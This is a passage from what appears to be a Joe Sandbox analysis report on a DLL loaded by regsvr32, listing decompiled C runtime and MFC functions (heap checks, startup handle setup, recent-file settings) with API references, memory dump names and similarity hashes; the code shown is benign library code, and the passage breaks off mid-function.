0x10062d37
0x10062d40
0x10062d44
0x10062d4e
0x10062d4e
0x10062d5f
0x10062d67
0x10062d6e
0x10062d76

APIs

__EH_prolog.LIBCMT ref: 10062D02

Part of subcall function 10047AE3: __EH_prolog.LIBCMT ref: 10047AE8

Strings

Recent File List, xrefs: 10062D30
Settings, xrefs: 10062D58
File%d, xrefs: 10062D2B
PreviewPages, xrefs: 10062D53

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog
String ID: File%d$PreviewPages$Recent File List$Settings
API String ID: 3519838083-526586445
Opcode ID: ccb0e771f098f353717086a4bfd69ed39123cc27f0dbc363aef3e3e5c113375e
Instruction ID: 522774b861866affa3c6d0406ac10c25af3913b698b75e3a091b165f6fc4fbbe
Opcode Fuzzy Hash: ccb0e771f098f353717086a4bfd69ed39123cc27f0dbc363aef3e3e5c113375e
Instruction Fuzzy Hash: B8018175A00B08ABDB98DF64CD02B9E76A6EF04311F10816AF756AA2C1CB789940C74A

Uniqueness

Uniqueness Score: -1.00%

Function 10020785 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10020785() {
				void* _v8;
				signed char _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr* _v64;
				void _v320;
				signed int _t107;
				signed int _t110;
				signed int _t112;
				void* _t113;
				intOrPtr _t123;
				signed int _t124;
				signed int _t128;
				signed char* _t130;
				signed int _t133;
				void* _t140;
				void* _t141;
				signed int _t145;
				signed char _t147;
				signed char _t150;
				void* _t152;
				signed int* _t156;
				void* _t159;
				intOrPtr* _t161;
				signed int _t162;
				signed int* _t163;
				signed int _t164;
				signed char _t167;
				signed int _t168;
				void* _t169;
				intOrPtr* _t170;
				signed char* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_t107 =  *0x100967a0; // 0x1
				_t110 = IsBadWritePtr( *0x100967a4, _t107 + _t107 * 4 << 2);
				if(_t110 != 0) {
					return _t110 | 0xffffffff;
				}
				_t140 =  *0x100967a4; // 0xda07d0
				_t164 = 0;
				__eflags =  *0x100967a0 - _t164; // 0x1
				_v60 = _t140;
				_v36 = 0;
				if(__eflags <= 0) {
					L56:
					__eflags = 0;
					return 0;
				} else {
					while(1) {
						L5:
						_t169 =  *(_t140 + 0x10);
						_t112 = IsBadWritePtr(_t169, 0x41c4);
						__eflags = _t112;
						if(_t112 != 0) {
							break;
						}
						_v48 = _t164;
						_v16 =  *((intOrPtr*)(_t140 + 0xc));
						_v44 = _t169 + 0x144;
						_t170 = _t169 + 0xc4;
						_v24 =  *((intOrPtr*)(_t140 + 8));
						_v28 = _t164;
						_v52 = _t164;
						_v64 = _t170;
						while(1) {
							_v40 = _t164;
							_v32 = _t164;
							_v8 = _t164;
							_t145 = 0x40;
							__eflags = _v24;
							memset( &_v320, 0, _t145 << 2);
							_t174 = _t174 + 0xc;
							if(__eflags < 0) {
								goto L50;
							}
							L9:
							_t124 = IsBadWritePtr(_v16, 0x8000);
							__eflags = _t124;
							if(_t124 != 0) {
								_push(0xfffffffc);
								L73:
								_pop(_t113);
								return _t113;
							}
							_t141 = 0;
							__eflags = 0;
							_t161 = _v16 + 0xffc;
							while(1) {
								__eflags =  *((intOrPtr*)(_t161 - 0xff4)) - 0xffffffff;
								_t171 = _t161 - 0xff0;
								if( *((intOrPtr*)(_t161 - 0xff4)) != 0xffffffff) {
									break;
								}
								__eflags =  *_t161 - 0xffffffff;
								if( *_t161 != 0xffffffff) {
									break;
								} else {
									goto L13;
								}
								do {
									L13:
									_t147 =  *_t171;
									__eflags = _t147 & 0x00000001;
									_t167 = _t147;
									if((_t147 & 0x00000001) == 0) {
										_t128 = (_t147 >> 4) - 1;
										__eflags = _t128 - 0x3f;
										if(_t128 > 0x3f) {
											_t128 = 0x3f;
										}
										_t31 = _t173 + _t128 * 4 - 0x13c;
										 *_t31 =  *(_t173 + _t128 * 4 - 0x13c) + 1;
										__eflags =  *_t31;
										L19:
										__eflags = _t147 - 0x10;
										if(_t147 < 0x10) {
											L62:
											_push(0xfffffff9);
											goto L73;
										}
										__eflags = _t147 & 0x0000000f;
										if((_t147 & 0x0000000f) != 0) {
											goto L62;
										}
										__eflags = _t147 - 0xff0;
										if(_t147 > 0xff0) {
											goto L62;
										}
										__eflags =  *((intOrPtr*)(_t147 + _t171 - 4)) - _t167;
										_t130 =  &(_t171[_t147]);
										if( *((intOrPtr*)(_t147 + _t171 - 4)) != _t167) {
											L61:
											_push(0xfffffff8);
											goto L73;
										}
										goto L23;
									}
									_t147 = _t147 - 1;
									__eflags = _t147 - 0x400;
									if(_t147 > 0x400) {
										_push(0xfffffffa);
										goto L73;
									}
									_v8 = _v8 + 1;
									goto L19;
									L23:
									_t171 = _t130;
									__eflags = _t171 - _t161;
								} while (__eflags < 0);
								if(__eflags != 0) {
									goto L61;
								}
								_t161 = _t161 + 0x1000;
								_t141 = _t141 + 1;
								__eflags = _t141 - 8;
								if(_t141 < 8) {
									continue;
								}
								_t172 = _v44;
								__eflags =  *_t172 - _v8;
								if( *_t172 != _v8) {
									_push(0xfffffff7);
									goto L73;
								}
								_t47 =  &_v12;
								 *_t47 = _v12 & 0x00000000;
								__eflags =  *_t47;
								_v8 =  &_v320;
								do {
									_t133 =  *(_t172 + 4);
									_v20 = _v20 & 0x00000000;
									_t168 = _t172 + 8;
									_t162 = _t172;
									__eflags = _t133 - _t172;
									_v56 = _t162;
									if(_t133 == _t172) {
										L45:
										__eflags =  *((intOrPtr*)(_t162 + 4)) - _t172;
										if( *((intOrPtr*)(_t162 + 4)) != _t172) {
											L70:
											_push(0xfffffff2);
											goto L73;
										}
										__eflags = _v20 -  *_v8;
										if(_v20 !=  *_v8) {
											goto L70;
										}
										__eflags =  *_t168 - _t162;
										if( *_t168 != _t162) {
											_push(0xfffffff1);
											goto L73;
										}
										goto L48;
									} else {
										goto L29;
									}
									while(1) {
										L29:
										__eflags = _v20 -  *_v8;
										if(_v20 ==  *_v8) {
											break;
										}
										_t152 = _v16;
										__eflags = _t133 - _t152;
										if(_t133 < _t152) {
											L68:
											_push(0xfffffff6);
											goto L73;
										}
										__eflags = _t133 - _t152 + 0x8000;
										if(_t133 >= _t152 + 0x8000) {
											goto L68;
										}
										_t156 = (_t133 & 0x0000f000) + 0xc;
										_t163 =  &(_t156[0x3fc]);
										__eflags = _t156 - _t163;
										if(_t156 == _t163) {
											L65:
											_push(0xfffffff5);
											goto L73;
										} else {
											goto L33;
										}
										while(1) {
											L33:
											__eflags = _t156 - _t133;
											if(_t156 == _t133) {
												break;
											}
											_t156 = _t156 + ( *_t156 & 0xfffffffe);
											__eflags = _t156 - _t163;
											if(_t156 != _t163) {
												continue;
											}
											break;
										}
										__eflags = _t156 - _t163;
										if(_t156 == _t163) {
											goto L65;
										}
										_t159 = ( *_t133 >> 4) - 1;
										__eflags = _t159 - 0x3f;
										if(_t159 > 0x3f) {
											_t159 = 0x3f;
										}
										__eflags = _t159 - _v12;
										if(_t159 != _v12) {
											_push(0xfffffff4);
											goto L73;
										}
										__eflags =  *((intOrPtr*)(_t133 + 8)) - _v56;
										if( *((intOrPtr*)(_t133 + 8)) != _v56) {
											_push(0xfffffff3);
											goto L73;
										}
										_v20 = _v20 + 1;
										_t162 = _t133;
										_t133 =  *(_t133 + 4);
										_v56 = _t162;
										__eflags = _t133 - _t172;
										if(_t133 != _t172) {
											continue;
										}
										break;
									}
									__eflags = _v20;
									if(_v20 != 0) {
										_t150 = _v12;
										__eflags = _t150 - 0x20;
										if(_t150 >= 0x20) {
											_v32 = _v32 | 0x80000000;
											_t75 =  &_v28;
											 *_t75 = _v28 | 0x80000000 >> _t150 + 0xffffffe0;
											__eflags =  *_t75;
										} else {
											_v40 = _v40 | 0x80000000;
											_v48 = _v48 | 0x80000000 >> _t150;
										}
									}
									goto L45;
									L48:
									_v12 = _v12 + 1;
									_v8 = _v8 + 4;
									__eflags = _v12 - 0x40;
									_t172 = _t168;
								} while (_v12 < 0x40);
								_t170 = _v64;
								_t140 = _v60;
								goto L50;
							}
							_push(0xfffffffb);
							goto L73;
							L50:
							__eflags = _v40 -  *((intOrPtr*)(_t170 - 0x80));
							if(_v40 !=  *((intOrPtr*)(_t170 - 0x80))) {
								L71:
								_push(0xfffffff0);
								goto L73;
							}
							__eflags = _v32 -  *_t170;
							if(_v32 !=  *_t170) {
								goto L71;
							}
							_v16 = _v16 + 0x8000;
							_v44 = _v44 + 0x204;
							_v24 = _v24 << 1;
							_v52 = _v52 + 1;
							_t170 = _t170 + 4;
							__eflags = _v52 - 0x20;
							_v64 = _t170;
							if(_v52 < 0x20) {
								_t164 = 0;
								__eflags = 0;
								_v40 = _t164;
								_v32 = _t164;
								_v8 = _t164;
								_t145 = 0x40;
								__eflags = _v24;
								memset( &_v320, 0, _t145 << 2);
								_t174 = _t174 + 0xc;
								if(__eflags < 0) {
									goto L50;
								}
								goto L9;
							}
							__eflags = _v48 -  *_t140;
							if(_v48 !=  *_t140) {
								L72:
								_push(0xffffffef);
								goto L73;
							}
							__eflags = _v28 -  *((intOrPtr*)(_t140 + 4));
							if(_v28 !=  *((intOrPtr*)(_t140 + 4))) {
								goto L72;
							}
							_t140 = _t140 + 0x14;
							_v36 = _v36 + 1;
							_t123 = _v36;
							_v60 = _t140;
							__eflags = _t123 -  *0x100967a0; // 0x1
							if(__eflags < 0) {
								_t164 = 0;
								__eflags = 0;
								goto L5;
							}
							goto L56;
						}
					}
					_push(0xfffffffe);
					goto L73;
				}
			}

0x1002078e
0x100207a3
0x100207ab
0x00000000
0x100207ad
0x100207b5
0x100207bb
0x100207bd
0x100207c3
0x100207c6
0x100207c9
0x10020a70
0x10020a70
0x00000000
0x100207cf
0x100207d3
0x100207d3
0x100207d3
0x100207dc
0x100207e2
0x100207e4
0x00000000
0x00000000
0x100207ed
0x100207f0
0x100207f9
0x100207ff
0x10020805
0x10020808
0x1002080b
0x1002080e
0x10020815
0x10020817
0x1002081a
0x1002081d
0x10020822
0x10020823
0x1002082c
0x1002082c
0x1002082e
0x00000000
0x00000000
0x10020834
0x1002083c
0x10020842
0x10020844
0x10020a7b
0x10020ab1
0x10020ab1
0x00000000
0x10020ab1
0x1002084d
0x1002084d
0x1002084f
0x10020855
0x10020855
0x1002085c
0x10020862
0x00000000
0x00000000
0x10020868
0x1002086b
0x00000000
0x00000000
0x00000000
0x00000000
0x10020871
0x10020871
0x10020871
0x10020873
0x10020876
0x10020878
0x10020891
0x10020892
0x10020895
0x10020899
0x10020899
0x1002089a
0x1002089a
0x1002089a
0x100208a8
0x100208a8
0x100208ab
0x10020a87
0x10020a87
0x00000000
0x10020a87
0x100208b1
0x100208b4
0x00000000
0x00000000
0x100208ba
0x100208c0
0x00000000
0x00000000
0x100208c6
0x100208ca
0x100208cd
0x10020a83
0x10020a83
0x00000000
0x10020a83
0x00000000
0x100208cd
0x1002087a
0x1002087b
0x10020881
0x10020a7f
0x00000000
0x10020a7f
0x10020887
0x00000000
0x100208d3
0x100208d3
0x100208d5
0x100208d5
0x100208d9
0x00000000
0x00000000
0x100208df
0x100208e5
0x100208e6
0x100208e9
0x00000000
0x00000000
0x100208ef
0x100208f5
0x100208f7
0x10020a8f
0x00000000
0x10020a8f
0x100208fd
0x100208fd
0x100208fd
0x10020907
0x1002090a
0x1002090a
0x1002090d
0x10020911
0x10020914
0x10020916
0x10020918
0x1002091b
0x100209d6
0x100209d6
0x100209d9
0x10020aa7
0x10020aa7
0x00000000
0x10020aa7
0x100209e5
0x100209e7
0x00000000
0x00000000
0x100209ed
0x100209ef
0x10020aa3
0x00000000
0x10020aa3
0x00000000
0x00000000
0x00000000
0x00000000
0x10020921
0x10020921
0x10020927
0x10020929
0x00000000
0x00000000
0x1002092b
0x1002092e
0x10020930
0x10020a9f
0x10020a9f
0x00000000
0x10020a9f
0x1002093c
0x1002093e
0x00000000
0x00000000
0x1002094b
0x1002094e
0x10020954
0x10020956
0x10020a93
0x10020a93
0x00000000
0x00000000
0x00000000
0x00000000
0x1002095c
0x1002095c
0x1002095c
0x1002095e
0x00000000
0x00000000
0x10020965
0x10020967
0x10020969
0x00000000
0x00000000
0x00000000
0x10020969
0x1002096b
0x1002096d
0x00000000
0x00000000
0x10020978
0x10020979
0x1002097c
0x10020980
0x10020980
0x10020981
0x10020984
0x10020a97
0x00000000
0x10020a97
0x1002098d
0x10020990
0x10020a9b
0x00000000
0x10020a9b
0x10020996
0x10020999
0x1002099b
0x1002099e
0x100209a1
0x100209a3
0x00000000
0x00000000
0x00000000
0x100209a3
0x100209a9
0x100209ad
0x100209af
0x100209b2
0x100209b5
0x100209d0
0x100209d3
0x100209d3
0x100209d3
0x100209b7
0x100209be
0x100209c1
0x100209c1
0x100209b5
0x00000000
0x100209f5
0x100209f5
0x100209f8
0x100209fc
0x10020a00
0x10020a00
0x10020a08
0x10020a0b
0x00000000
0x10020a0b
0x10020a8b
0x00000000
0x10020a0e
0x10020a11
0x10020a14
0x10020aab
0x10020aab
0x00000000
0x10020aab
0x10020a1d
0x10020a1f
0x00000000
0x00000000
0x10020a25
0x10020a2c
0x10020a33
0x10020a36
0x10020a39
0x10020a3c
0x10020a40
0x10020a43
0x10020813
0x10020813
0x10020817
0x1002081a
0x1002081d
0x10020822
0x10020823
0x1002082c
0x1002082c
0x1002082e
0x00000000
0x00000000
0x00000000
0x1002082e
0x10020a4c
0x10020a4e
0x10020aaf
0x10020aaf
0x00000000
0x10020aaf
0x10020a53
0x10020a56
0x00000000
0x00000000
0x10020a58
0x10020a5b
0x10020a5e
0x10020a61
0x10020a64
0x10020a6a
0x100207d1
0x100207d1
0x00000000
0x100207d1
0x00000000
0x10020a6a
0x10020815
0x10020a77
0x00000000
0x10020a77

APIs

IsBadWritePtr.KERNEL32(00000001), ref: 100207A3
IsBadWritePtr.KERNEL32(?,000041C4), ref: 100207DC
IsBadWritePtr.KERNEL32(?,00008000), ref: 1002083C

Strings

, xrefs: 10020A3C
@, xrefs: 100209FC

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Write
String ID: $@
API String ID: 3165279579-1077428164
Opcode ID: 28ca09a05814d08e1e281cf76bd72b04f96bb62e478bf40d7de9483f44ccb1eb
Instruction ID: 2d7102151bc6920896a2415e59de05fa1046e3eb631235b8df769b4bd2de33e0
Opcode Fuzzy Hash: 28ca09a05814d08e1e281cf76bd72b04f96bb62e478bf40d7de9483f44ccb1eb
Instruction Fuzzy Hash: A2A14D31D0431ADBDF14CB98E89069DB7B2FB44368FF1866AE826A62D2D7709941CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1002151A Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1002151A() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int* _t59;
				signed char _t63;
				void** _t67;
				signed int* _t69;
				signed int _t72;
				int* _t73;
				signed int* _t75;
				void* _t76;
				signed int* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				signed int** _t92;

				_t89 = E1001A76A(0x480);
				if(_t89 == 0) {
					E1001A9AD(0x1b);
				}
				 *0x10095300 = _t89;
				 *0x1009543c = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t89 =  &(_t89[9]);
					_t48 =  &(( *0x10095300)[0x120]);
				}
				GetStartupInfoA( &_v76);
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					do {
						_t75 =  *0x10095300;
						_t50 = _t72 + _t72 * 8;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t90[1] = _t90[1] | 0x00000080;
							goto L37;
						}
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							if(_t58 != 2) {
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
					} while (_t72 < 3);
					return SetHandleCount( *0x1009543c);
				}
				_t59 = _v76.lpReserved2;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 =  &(_t59[1]);
				_v8 = _t73 + _t88;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				if( *0x1009543c >= _t88) {
					L18:
					_t91 = 0;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						if(_t76 != 0xffffffff) {
							_t63 =  *_t73;
							if((_t63 & 0x00000001) != 0 && ((_t63 & 0x00000008) != 0 || GetFileType(_t76) != 0)) {
								_t67 =  &(0x10095300[_t91 >> 5][(_t91 & 0x0000001f) + (_t91 & 0x0000001f) * 8]);
								 *_t67 =  *_v8;
								_t67[1] =  *_t73;
							}
						}
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 =  &(_t73[0]);
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x10095304;
					while(1) {
						_t69 = E1001A76A(0x480);
						if(_t69 == 0) {
							break;
						}
						 *0x1009543c =  *0x1009543c + 0x20;
						 *_t92 = _t69;
						_t13 =  &(_t69[0x120]); // 0x480
						_t84 = _t13;
						while(_t69 < _t84) {
							_t69[1] = _t69[1] & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							_t69[2] = _t69[2] & 0x00000000;
							_t69[1] = 0xa;
							_t69 =  &(_t69[9]);
							_t84 =  &(( *_t92)[0x120]);
						}
						_t92 =  &(_t92[1]);
						if( *0x1009543c < _t88) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x1009543c;
					goto L18;
				}
			}

0x1002152d
0x10021532
0x10021536
0x1002153b
0x1002153c
0x10021542
0x1002154c
0x1002154c
0x10021552
0x10021556
0x1002155a
0x1002155d
0x10021561
0x1002156a
0x1002156d
0x1002156d
0x10021578
0x10021583
0x1002165a
0x1002165a
0x1002165c
0x1002165c
0x10021662
0x10021669
0x1002166c
0x100216bb
0x00000000
0x100216bb
0x10021670
0x10021674
0x10021680
0x10021682
0x10021676
0x10021678
0x10021678
0x1002168c
0x10021691
0x100216aa
0x100216aa
0x10021693
0x10021694
0x1002169c
0x00000000
0x00000000
0x1002169e
0x100216a3
0x100216a8
0x100216b3
0x100216b5
0x100216b5
0x00000000
0x100216b3
0x00000000
0x100216a8
0x100216bf
0x100216bf
0x100216c0
0x100216d5
0x100216d5
0x10021589
0x1002158e
0x00000000
0x00000000
0x10021594
0x10021596
0x1002159c
0x100215a6
0x100215a8
0x100215a8
0x100215b0
0x10021608
0x10021608
0x1002160c
0x00000000
0x00000000
0x00000000
0x00000000
0x1002160e
0x1002160e
0x10021611
0x10021616
0x10021618
0x1002161c
0x10021641
0x10021649
0x1002164d
0x1002164d
0x1002161c
0x10021650
0x10021654
0x10021655
0x10021656
0x00000000
0x100215b2
0x100215b2
0x100215b7
0x100215bc
0x100215c4
0x00000000
0x00000000
0x100215c6
0x100215cd
0x100215cf
0x100215cf
0x100215d5
0x100215d9
0x100215dd
0x100215e0
0x100215e4
0x100215ea
0x100215ed
0x100215ed
0x100215f5
0x100215fe
0x00000000
0x00000000
0x00000000
0x10021600
0x10021602
0x00000000
0x10021602

APIs

GetStartupInfoA.KERNEL32 ref: 10021578
GetFileType.KERNEL32 ref: 10021623
GetStdHandle.KERNEL32(-000000F6), ref: 10021686
GetFileType.KERNEL32 ref: 10021694
SetHandleCount.KERNEL32 ref: 100216CB

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 8b39d72962f22fd182bb196232d6e29b147ddf790dbb36a0cab0e4fa173ddec3
Instruction ID: b848695659e5d834963e22f2f7e7661f006c0a5da5088cd19e9642882ac6dac5
Opcode Fuzzy Hash: 8b39d72962f22fd182bb196232d6e29b147ddf790dbb36a0cab0e4fa173ddec3
Instruction Fuzzy Hash: 065147399046518FD310CF38D89879D3BE1FF21369FA98669D4AADB2E1D731D949CB00

Uniqueness

Uniqueness Score: -1.00%

Function 100190FD Relevance: 7.6, APIs: 5, Instructions: 149
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100190FD(intOrPtr __ecx, void* __edx) {
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t75;
				signed int _t77;
				int _t96;
				CHAR* _t130;
				signed int _t133;
				signed int _t135;
				void* _t137;
				void* _t139;
				long long* _t140;

				E1001A9E0(0x10077eab, _t137);
				_t140 = _t139 - 0x44;
				_t64 =  *0x1008f630; // 0x1008f644
				 *(_t137 - 0x1c) =  *(_t137 - 0x1c) & 0x00000000;
				 *((intOrPtr*)(_t137 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t137 - 0x10)) = _t64;
				_t65 =  *((intOrPtr*)(__ecx + 8));
				_t133 = 1;
				 *(_t137 - 4) = _t133;
				if(_t65 != 2) {
					__eflags = _t65 - _t133;
					if(__eflags == 0) {
						L11:
						E100478EF(_t137 - 0x10, __eflags, 0xf09a);
						E10045693( *((intOrPtr*)(_t137 + 8)), _t137 - 0x10);
						 *(_t137 - 0x1c) = _t133;
						L12:
						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
						E1004591E(_t137 - 0x10);
						_t70 =  *((intOrPtr*)(_t137 + 8));
						L13:
						 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
						return _t70;
					}
					 *_t140 =  *((long long*)(__ecx));
					__eflags = E100182D2(__ecx, __edx, __eflags, __ecx, __ecx, _t137 - 0x50);
					if(__eflags == 0) {
						goto L11;
					}
					E100184AD(_t137 - 0x50);
					_t75 =  *0x1008f630; // 0x1008f644
					 *((intOrPtr*)(_t137 - 0x14)) = _t75;
					_t130 =  *(_t137 + 0xc);
					_t14 = _t137 + 0xc;
					 *_t14 =  *(_t137 + 0xc) & 0x00000000;
					__eflags =  *_t14;
					 *(_t137 - 4) = 2;
					 *((intOrPtr*)(_t137 - 0x18)) = lstrlenA(_t130);
					_t77 = E10045D4E(_t137 - 0x14, _t137, _t76);
					while(1) {
						__eflags =  *_t130;
						_t135 = _t77;
						if(__eflags == 0) {
							break;
						}
						__eflags =  *_t130 - 0x25;
						if( *_t130 == 0x25) {
							__eflags = _t130[1] - 0x44;
							if(_t130[1] == 0x44) {
								E1001B630(E1001C33C(), _t137 - 0x2c, 0xa);
								_t140 = _t140 + 0xc;
